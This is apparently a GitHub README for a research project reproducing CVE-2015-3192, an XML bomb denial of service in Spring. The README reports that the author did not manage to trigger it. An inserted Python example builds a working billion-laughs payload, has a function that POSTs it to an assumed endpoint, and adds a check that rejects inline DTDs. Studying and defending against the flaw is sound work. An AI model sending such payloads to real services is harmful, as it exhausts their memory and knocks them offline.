chuajiesheng / spring-xml-bomb

Vulnerability of Spring to XML Bomb

Referencing CVE-2015-3192 (Spring Framework 3.2.x before 3.2.14 and 4.x before 4.1.7 processed inline DTD declarations when DTD support was not entirely disabled, so a crafted XML document with nested entity declarations, an XML bomb, could exhaust memory and cause a denial of service):

  1. Pivotal CVE
  2. SourceClear CVE
  3. Spring Bug Report

Objective of this project:

  1. Determine the vulnerable methods causing this bug
  2. Proof of concept of the vulnerability

Plan:

  1. Have a simple hello world Spring application
  2. Accept XML payload
  3. Send XML bomb
  4. Demonstrate vulnerability

Steps

  1. Run the sample app via mvn jetty:run
  2. Change the sample code to use Spring 3.2.0.RELEASE, which is one of the affected versions (3.2.x before 3.2.14, 4.x before 4.1.7)
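The payload behind plan steps 2 to 4, as an added example in Python that is not code from this repository or from Spring: it builds the inline-DTD "billion laughs" document that CVE-2015-3192 concerns, computes how large the single &lol9; reference expands (about 3 GB from roughly 1 KB of input), and shows the parser-level check a hardened service applies, refusing any DOCTYPE before entities are declared or expanded. The endpoint URL, the `greeting` root element and the expat-based check are assumptions for illustration, not Spring's own converter code.

```python
"""Added example (not part of the chuajiesheng/spring-xml-bomb project):
build the inline-DTD 'billion laughs' payload CVE-2015-3192 describes,
estimate its expanded size, and reject it at parse time before expansion.
The target URL and the root element name are assumptions."""
import urllib.request
import xml.parsers.expat

LEAF = "lol"


def build_xml_bomb(depth=9, fanout=10, root="greeting"):
    """Inline DTD where each entity holds `fanout` references to the previous one.
    References inside an entity value are stored verbatim; the whole tree is only
    expanded when the body references the outermost entity."""
    decls = [f'<!ENTITY {LEAF}0 "{LEAF}">']
    for level in range(1, depth + 1):
        value = f"&{LEAF}{level - 1};" * fanout
        decls.append(f'<!ENTITY {LEAF}{level} "{value}">')
    dtd = "<!DOCTYPE {} [\n{}\n]>".format(root, "\n".join(decls))
    return f'<?xml version="1.0"?>\n{dtd}\n<{root}>&{LEAF}{depth};</{root}>\n'


def expanded_size(depth=9, fanout=10):
    """Bytes a DTD-processing parser must materialise for the outermost entity."""
    return len(LEAF) * fanout ** depth


class DtdRejected(Exception):
    pass


def parse_rejecting_dtd(payload):
    """Parse with expat, aborting as soon as a DOCTYPE (any inline DTD) appears.
    The handler fires before entity declarations are recorded, so nothing is
    ever expanded. Returns the element names seen, in document order."""
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE for <{name}> not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(payload, True)  # a raised handler exception stops the parse
    return elements


def accepts(payload):
    """True if the document passes the no-DTD check."""
    try:
        parse_rejecting_dtd(payload)
        return True
    except DtdRejected:
        return False


def send_payload(url, payload, timeout=5):
    """POST the document as application/xml to an assumed endpoint; returns HTTP status."""
    req = urllib.request.Request(
        url, data=payload, method="POST",
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    bomb = build_xml_bomb().encode()
    print(f"payload: {len(bomb)} bytes, expands to {expanded_size():,} bytes")
    print("rejected by the no-DTD check:", not accepts(bomb))
    # Assumed endpoint of the sample app; enable once it accepts XML:
    # send_payload("http://localhost:8080/greeting", bomb)
```

Run it with python3 to print the size figures; enable the send_payload call once the sample app has an endpoint that accepts application/xml. A converter that still honours the inline DTD has to hold the roughly 3 GB expansion in memory, which is the out-of-memory denial of service the CVE describes; refusing the DOCTYPE outright, as the check above does, is the cheapest defence because the decision is made on about 1 KB of input.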

Reference

  1. Spring sample app

Outcome

  1. Did not manage to trigger the vulnerability even though the converter was initialised
  2. Need to better understand Spring initialisation and setup

About

License: Apache License 2.0

Languages

Language: Java 100.0%